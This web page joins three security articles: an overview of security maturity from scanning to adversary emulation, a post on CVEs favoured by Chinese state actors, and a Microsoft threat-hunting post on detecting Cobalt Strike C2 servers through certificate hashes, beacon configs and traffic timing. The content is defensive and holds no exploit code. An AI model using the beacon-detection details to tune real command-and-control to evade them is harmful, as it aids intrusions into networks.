That's why security teams should review their security processes periodically and keep aligned with new developments in defensive and offensive testing and modeling. Doing so can help move the needle on security maturity from the most basic to an advanced, much stronger security posture, and from a reactive to a proactive model.

**The Basics: Vulnerability Scanning**

The first step most IT organizations undertake is vulnerability scanning, which seeks out potential weaknesses in the network and endpoints that could be exploited by attackers. There's a wide variety of scanners available as open source or commercial software, as managed services, and on cloud platforms like AWS and Alibaba. Some of the more popular scanners include Nessus, Burp Suite, Nmap, and Qualys, though each has its own area of focus. Several offer automatic patch remediation, as well.

Another consideration is whether to perform an external scan — which can discover potential vulnerabilities that hackers can exploit — or internal scanning that can find potential paths attackers would take once inside the network. Many, if not most, IT teams will do both.

While vulnerability scanning is relatively easy to use, it's not the end-all, be-all of a security strategy. For example, scanning might not detect subtle misconfigurations or the more complicated attack paths that advanced persistent threats (APTs) might take. They're also often prone to false positives and must be updated consistently.

Overall, though, vulnerability scanning is an important baseline step. Once it's running well, the next step is penetration testing.

**Penetration Testing**

Penetration testing typically entails human ethical hackers who attempt to gain access to the network interior, much as an outside hacker would. Here, too, there's a wide variety of tools and services available — many of the aforementioned vulnerability scanners offer tools that can be used in pen testing. Others include Metasploit, Kali Linux, Cobalt.io, and Acunetix.

Run periodically, pen testing can uncover weaknesses that aren't found by vulnerability scanners. Furthermore, human-managed pen testing can explore more complex pathways and technique combinations that hackers increasingly leverage to exploit victims, such as phishing.

Not surprisingly, the biggest trends impacting networking and cybersecurity are essentially the same trends noted in penetration testing this year: rampant ransomware attacks, the newly distributed workforce, and the rise of Web applications and cloud usage to support remote workers. Each of these trends will require thoughtful consideration in choosing tools and designing plans for penetration testing.

While penetration testing can provide a great deal of benefit, it's a good idea to periodically review the wealth of information on best practices available online.

**Red Team/Purple Team**

The third step in the quest for security maturity is usually the establishment of a red team that will manually attempt to attack and penetrate the organization's security defenses. This may be a completely separate team, or it may be closely allied with the blue team (the defenders) in a combination called a purple team. As another option, some vendors offer red-team services on a subscription or one-off basis.

A red team will imitate the tactics, techniques, and procedures (TTPs) that attackers use — which usually turns up more points of vulnerability than penetration testing can reveal. The blue team can then begin to resolve these weaknesses, further hardening the network against attack.

But too often, red and blue teams devolve into an adversarial relationship that's counterproductive. It's also quite expensive to set up a red team, and given the shortage of cybersecurity professionals, it may not be feasible. Therefore, many CISOs are investigating two newer trends: adversary emulation and adversary simulation.

**Using Adversary TTPs for Good**

There are vast, freely available libraries of common tactics, techniques, and procedures used during attacks, such as MITRE's ATT&CK framework. Adversary emulation and simulation leverage these libraries to evaluate security based on intelligence for specific attacks and then simulating the TTPs used.

For example, MITRE developed a sample adversary emulation plan for APT3, an advanced persistent threat that previously targeted mostly US entities. The emulation plan covers three phases from command-and-control setup to initial access; from host compromise through to execution; and data collection through exfiltration. The Center for Threat-Informed Defense has posted other emulation plans.

Adversary emulation lets security teams assess their defenses against real-world attacks. It can also be used to test the security infrastructure's detection and response rates.

**Looking Ahead**

Security vendors are moving beyond simply advocating the concept of MITRE's ATT&CK and MITRE Shield. Many vendors are leveraging one or both to improve their own products and services. For example, some security vendors map anomalies and events to the ATT&CK framework, making it easier for security teams to respond.

MITRE's CALDERA also deserves attention. It provides an intelligent, automated adversary emulation system that can be programmed for a specific attack profile and launched into the network to test its defenses. Caldera can also be used to train blue teams on detecting and remediating specific attacks.

There are also open source projects for adversary behavior simulation in development. A few of them of note include Uber's Metta, Nextron Systems' APT Simulator, Elastic/Endgame's Red Team Automation, CyberMonitor's Invoke-Adversary, and Red Canary's Atomic Red Team.

**Conclusion**

Keeping abreast of developments in key security processes is important for security teams as they strive to defend the network against changing threats. By so doing, they can move the organization closer to a far stronger security posture.

What You Need for a Strong Security Posture

Categories: Exploits and vulnerabilities
Categories: News
Tags: Chinese APT

Tags:  advanced persistent threat

Tags:  APT

Tags:  CISA

Tags:  NSA

Tags:  FBI

Tags:  security advisory

CISA, the NSA and the FBI have compiled a list of the vulnerabilities targeted by state-sponsorted threat actors from China.



(Read more...)




The post Chinese APT's favorite vulnerabilities revealed appeared first on Malwarebytes Labs.

In a joint cybersecurity advisory, the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.

The advisory aims to "inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs)."

The US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the DIB (Defense Industrial Base) sector, which is related to military weapons systems; and other critical infrastructure sectors.

It is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.

The advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.

Last year, CISA began publishing a catalog of actively exploited vulnerabilities that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of vulnerabilities favored by Russian state-sponsored threat actors.

If your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.

**The vunerabilities****Remote code execution (RCE)**

RCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: CVE-2021-44228 (also known as Log4Shell or LogJam), CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-26084, CVE-2021-42237, CVE-2022-1388, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065.

**Arbitrary file read**

The advisory identifies two arbitrary file read flaws—CVE-2019-11510 and CVE-2021-22005—which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.

**Authentication bypass by spoofing**

CVE-2022-24112 is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.

**Command injection**

CVE-2021-36260 is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.

**Command line execution**

CVE-2021-1497 is a command injection flaw that allows attackers to inject data into an affected system's command line.

**Path Traversal**

Also known as "directory traversal," these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like ../ into file or directory paths. CVE-2019-19781, CVE-2021-41773, and CVE-2021-20090 are all forms of path traversal attack.

**Mitigations**

The NSA, CISA, and FBI urge organizations to undertake the following mitigations:

*   *   Apply patches as they come, prioritizing the most critical l flaws in your environment.
    *   Use multi-factor authentication.
    *   Require the use of strong, unique passwords.
    *   Upgrade or replace software or devices that are at, or close to, their end of life.
    *   Consider adopting a zero-trust security model.
    *   Monitor and log Internet-facing systems for abnormal activity.

Chinese APT's favorite vulnerabilities revealed

Introduction Cobalt Strike is a commercial Command and Control framework built by Helpsystems. You can find out more about Cobalt Strike on the MITRE ATT&CK page. But it can also be used by real adversaries. In this post we describe how to use RiskIQ and other Microsoft technologies to see if you have Cobalt Strike …
  Hunting for Cobalt Strike: Mining and plotting for fun and profit Read More »

**Introduction**

Cobalt Strike is a commercial Command and Control framework built by Helpsystems. You can find out more about Cobalt Strike on the MITRE ATT&CK page. But it can also be used by real adversaries. In this post we describe how to use RiskIQ and other Microsoft technologies to see if you have Cobalt Strike payloads (also called “beacons”) in your network.

Hunting for Cobalt Strike beacons across large environments can be a challenge for threat hunting teams. But with that comes a great amount of creativity and opportunity. In this blog post, the Microsoft Security Response Center’s (MSRC) Threat Hunting team seeks to improve the visibility of our environment, for both internal security and our customers, by exploring hunting methodologies for Cobalt Strike Command and Control (C2) traffic.

**Finding Cobalt Strike Team Servers**

In January 2021, RiskIQ  released a blog post discussing the utilization of JARM hashes to identify malicious infrastructure across the internet in their platform. Since then, there’s been an ever-increasing number of threat hunting groups and SOC’s utilizing JARM hashes within their organizations to detect malicious activity. Later that year, at the SANS Threat Hunting Summit & Training 2021, José Hernandez and Michael Haag presented a fantastic framework to the community for utilizing internet scanning services combined with JARM hashes to pull lists of potential Cobalt Strike Team Servers. These IPs are then probed for the beacon config, utilizing an open source NMAP script by Wade Hickey and Zach Stanford. You can find out more about JARM here.

As explained by José Hernandez and Michael Haag in their SANS Threat Hunting Summit talk, there are several benefits to identifying Cobalt Strike servers by utilising scanning services like Microsoft Defender Threat Intelligence. The primary one is that we avoid scanning the entire internet, which can be problematic. We also can leverage the multitude of data types they collect to vary our capabilities in identifying teams’ servers. Three such data types are Jarm Fuzzy Hashing, Banners, and TLS Serials/hashes.

One thing to note about using JARM hashes are that they do not always provide exact answers for finding Cobalt Strike Team Servers. As demonstrated by Raphael Mudge on HelpSystems website, JARM fingerprints can be altered based on the server configuration. Thus, it can be fruitful to utilize other data types within internet scanning datasets.

In our fork of José Hernandez and Michael Haag’s framework, we utilize JARM fuzzy hashing, banners, and TLS Serials/hashes. We have a public example of this implementation with a RiskIQ module for JARM & TLS Hashes here.

Below highlights an example module implementation of the Melting-Cobalt framework utilizing the RiskIQ Community API’s SSL Certificate class to pull all IP addresses that match the SHA1 hash for default Cobalt Strike Team Servers:

‘6ece5ece4192683d2d84e25b0ba7e04f9cb7eb7c’

_Figure 1 Example of API calls to RiskIQ to get SSL Certificate hash_

We can run this scanner by using a Virtual Machine in Azure, or by utilizing serverless solutions such as Azure Functions. We can then start to pull IP addresses from our scanning service API’s and probe them for Cobalt Strike beacons. If a Cobalt Strike beacon is returned, we store the data ready for ingest into our database.  

_Figure 2 Example of an extracted Cobalt Strike beacon_

Now that we have discussed a methodology to identify Cobalt Strike Team Servers and carve out beacon configs, we need somewhere to ingest the data to begin hunting.

Since we here at Microsoft have a large amount of infrastructure, we like to utilize fast and scalable data analytics platforms to support our hunting such as Microsoft Sentinel and Azure Data Explorer. In a later blog post, we will discuss utilizing Microsoft Sentinel to use this data to hunt within your SIEM environment. To find out more how you can integrate such a feed to your Sentinel instance, head over to Microsoft Docs where you can learn more about ingesting STIX/TAXII feeds to Sentinel. Ingesting the extracted Cobalt Strike beacons to your Sentinel instance, can be a quick and effective way to correlate network data in your SIEM.

But for now, we will discuss how you can utilize this data within Azure Data Explorer. This enables us to have great insights into streaming data, time-series analysis, and an advanced query language to build models to detect patters within our network data. Ingesting and plotting the data

As a hunting team, we love to use Kusto Query Language (KQL) to build hunting queries and produce signals. Azure Data Explorer (in addition to products like Sentinel) provide great hunting grounds based on where your data sits. To ingest data to Azure Data Explorer using Python, we have a simple to use application that can get you started: azure-kusto-python/quick\_start at master · Azure/azure-kusto-python (github.com).

An example Kusto configuration for ingesting our Cobalt Strike Beacon data can be found below, where we are ingesting data to a table called “CobaltStrikeActiveDiscovery”:

    
    {
    	"kustoUri" : "https://YOURADXCLUSTER.kusto.windows.net",
    	"ingestUri" : "https://ingest-YOURADXCLUSTER.kusto.windows.net",
    	"databaseName" : "ThreatHunting",
    	"tableName" : "CobaltStrikeActiveDiscovery",
    	"useExistingTable": false,
    	"alterTable": true,
    	"queryData": true,
    	"ingestData": true,
    	"tableSchema" : "(TIMESTAMP:datetime, nmap_cmd:string, ip:string, port:string, protocol:string, service:string, hostnames:string, x64_sha1:string, x64_sha246:string, x64_md5:string, x86_sha1:string, x86_sha256:string, x86_md5:string, x64_config_method_1:string, x64_config_method_2:string, x64_config_port:string, x64_config_spawn_to_x64:string, x64_config_spawn_to_x86:string, x64_config_jitter:string, max_dns:string, dns_idle:string, dns_sleep:string, user_agent:string, watermark:string, c2_host_header:string, x64_config_polling:string, x64_config_c2_server:string, x64_config_beacon_type:string, x64_config_http_method_path_2:string, x64_uri_queried:string, x86_config_method_1:string, x86_config_method_2:string, x86_config_port:string, x86_config_spawn_to_x64:string, x86_config_spawn_to_x86:string, x86_config_jitter:string, x86_config_polling:string, x86_config_c2_server:string, x86_config_beacon_type:string, x86_config_http_method_path_2:string)",
    	"data" :
    	[
    		{
    			"sourceType": "localFileSource",
    			"dataSourceUri": "results.json",
    			"format": "MULTIJSON",
    			"useExistingMapping": false,
    			"mappingName": "CobaltStrikeMapping",
    			"mappingValue": "[{\"Properties\":{\"Path\":\"$.TIMESTAMP\"},\"column\":\"TIMESTAMP\",\"datatype\":\"datetime\"}, {\"Properties\":{\"Path\":\"$.nmap_cmd\"},\"column\":\"nmap_cmd\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.ip\"},\"column\":\"ip\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.port\"},\"column\":\"port\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.protocol\"},\"column\":\"protocol\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.service\"},\"column\":\"service\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.hostnames\"},\"column\":\"hostnames\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_sha1\"},\"column\":\"x64_sha1\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_sha246\"},\"column\":\"x64_sha246\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_md5\"},\"column\":\"x64_md5\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_sha1\"},\"column\":\"x86_sha1\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_sha256\"},\"column\":\"x86_sha256\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_md5\"},\"column\":\"x86_md5\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_method_1\"},\"column\":\"x64_config_method_1\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_method_2\"},\"column\":\"x64_config_method_2\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_port\"},\"column\":\"x64_config_port\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_spawn_to_x64\"},\"column\":\"x64_config_spawn_to_x64\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_spawn_to_x86\"},\"column\":\"x64_config_spawn_to_x86\",\"datatype\":\"string\"},  {\"Properties\":{\"Path\":\"$.x64_config_jitter\"},\"column\":\"x64_config_jitter\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.max_dns\"},\"column\":\"max_dns\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.dns_idle\"},\"column\":\"dns_idle\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.user_agent\"},\"column\":\"user_agent\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.watermark\"},\"column\":\"watermark\",\"datatype\":\"string\"},  {\"Properties\":{\"Path\":\"$.c2_host_header\"},\"column\":\"c2_host_header\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_polling\"},\"column\":\"x64_config_polling\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_http_method_path_2\"},\"column\":\"x64_config_http_method_path_2\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_config_beacon_type\"},\"column\":\"x64_config_beacon_type\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x64_uri_queried\"},\"column\":\"x64_uri_queried\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_method_1\"},\"column\":\"x86_config_method_1\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_method_2\"},\"column\":\"x86_config_method_2\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_port\"},\"column\":\"x86_config_port\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_spawn_to_x64\"},\"column\":\"x86_config_spawn_to_x64\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_spawn_to_x86\"},\"column\":\"x86_config_spawn_to_x86\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_jitter\"},\"column\":\"x86_config_jitter\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_polling\"},\"column\":\"x86_config_polling\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_c2_server\"},\"column\":\"x86_config_c2_server\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_beacon_type\"},\"column\":\"x86_config_beacon_type\",\"datatype\":\"string\"}, {\"Properties\":{\"Path\":\"$.x86_config_http_method_path_2\"},\"column\":\"x86_config_http_method_path_2\",\"datatype\":\"string\"}]"
    		}
    	]
    }
    

Once ingested to Kusto, your Azure Data Explorer dataset should look like this:

_Figure 3 Example of Beacon Data ingested into Azure Data Explorer dataset #1_

_Figure 4 Example of Beacon Data ingested into Azure Data Explorer dataset #2_

You can see that we’re able to have valuable data streaming to this database ready for us to build data analytics over the top. Using https://dataexplorer.azure.com/, we can plot some insights aspects of the data in Dashboards that supports threat hunting activity using Kusto Query Language. Here are some examples using the multiple visual types available to us when adding a tile in the Data Explorer dashboard:

_Figure 5 Example table showing Team Server infrastructure movements by timestamp_

_Figure 6 Example bar chart showing count of Payload C2 user-agent configurations_

_Figure 7 Example bar chart showing C2 Host Headers_

_Figure 8 Example area chart showing the Cobalt Strike Team Server volume trend per day_

To build more advanced dashboards, we can utilize the multitude of data analytic functions built into Kusto Query Language (KQL). We can start to utilize this data to correlate it against other data sources, such as our internal network data.

**Hunting for potential compromises in the network**

One great thing about Azure Data Explorer, is that you can bring multiple datasets together and build efficient time series analysis. A key important note is that our data collection pays off by allowing us to get metrics on beacon configurations across the internet to support our hunting. Two key data points to hunt in network data are Polling (or sleep) and Jitter. These are determined by the operator or left as default to set the following configurations:

Polling or Sleep Time: The sleep time between each beacon callback in milliseconds

Jitter: The % of jitter on the polling time. The default is set to 0. A good example of in a configuration we have seen in the below screenshot: If the polling time is set to 25000 milliseconds, which rounds to 25 seconds and a jitter rate is set to 37% (37% of 25 = 9.25), the beacon would sleep between call backs anywhere between 15.75 and 34.25 seconds.

If we look across a sample set of our scanner data, we can gauge a picture of what configurations actors are using. In this snapshot below, we can see that the most common Jitter & Polling configuration is the default one, Jitter set to 0 and Polling rate set to 1 minute.

_Figure 9 Example snapshot of Jitter and Polling rates_

Plotting our Polling configuration, we can see that 80.1% of our data has the default polling rate set to 1 minute. With 30 seconds being the second most common. With an average of 51959 milliseconds or 51.959 seconds.

_Figure 10 Polling configuration in Milliseconds_

Going further, if we plot our Jitter configurations, seen in figure 11, we can see that 86% of our configurations are set to 0% Jitter. Using the Avg function in Kusto, we calculate the average across the dataset, resulting in an average Jitter percentage of 4%. This should allow us to get a better picture of the variance in frequency across our network data.

_Figure 11 Plotting the jitter configurations_

This gives us some interesting insights to look at when correlating our C2 data against our network data. Since the average polling time is 51.95 seconds and the average jitter time is 4%, on average we may see beacon traffic in our data showing callbacks on average between 49.87 seconds and 54.03 seconds. This is of course an average calculation across a sampled data set, but gives us as threat hunters an idea of what we may see when hunting for Cobalt Strike.

To leverage this further, let’s correlate the C2 data we’ve got and correlate it against our network data. You can use a multitude of network data to perform this hunting, whether you capture Zeek or netflow, for example.

Using Azure Logic Apps, we created a daily snapshot of network data that was talking to the C2s captured in our scanner data. We can do this by building Azure Logic App to run on daily cadence, with the Run async control command to ingest a dataset where any of our network traffic has a destination address of a C2 we have in our Cobalt Strike dataset. This should give us a daily feed of all network traffic relating to C2s that we can use to build time-series data.

We can use the make-series to create a series of aggregated requests per hour across the last 7 days. This would give us an indication of any beacon traffic that we can observe in this network. Here is an example query:

The result may look something like this:

_Figure 12 Plotting time series analysis across network data_

In our example shown above, we can see an immediate outlier within our data within the plotted green line. We see one machine, talking frequently to a Cobalt Strike C2 from our internal traffic over the last 7 days. This provides us an immediate place to start hunting for compromise, since this machine is talking externally at such a frequent rate it stands out as a predominant anomaly. The data shown above overall shows very small amounts of interactions with our Cobalt Strike C2s per hour. It’s unlikely that they could be compromised machines due to the low volume.

_NOTE: In this example, the network data we are using is sampled, which results in the count being lower than a polling rate of ~51.959 seconds._

With full fidelity network data, you may see an average count per hour of around ~50-~70 flows, however this does not encompass additional network data that can be captured during a suspected incident by an attacker interacting with a compromised machine, which will create a higher traffic count. In situations where you see a traffic count higher than the average polling rate, you may then be seeing examples of where the compromised machine is being interacted with by the attacker. This provides even more information about the compromise, including what time the attackers are interacting with the machine which can support time-zone attributions, etc.

In this example, this machine was compromised by Cobalt Strike, and our Time-Series analysis highlighted it effectively. It provided us with an immediate place to start hunting for compromise without the need for any detections on the machine itself.

In addition, picking out areas of high communication can facilitate hunting strategies and narrow down left and right goal posts when hunting across other mediums such as EDR or ETW datasets.

_Figure 13 Identifying areas of higher volume network traffic to C2s_

**Conclusion**

As threat hunters, we need to think about multiple ways to identify malicious activity in our environment and cover multiple mediums of data. In this blog post, we’ve discussed an example of utilizing scanning services API data, such as Risk IQ, to identify Cobalt Strike Team Servers, their C2’s and their beacon configuration. We’ve then demonstrated how to utilize this data to build effective ways of gaining valuable insight into what Cobalt Strike might look like in our environment, and ways of utilizing Time-Series analysis to identify compromise.  

**MSRC Threat Hunting**

Tag

#intel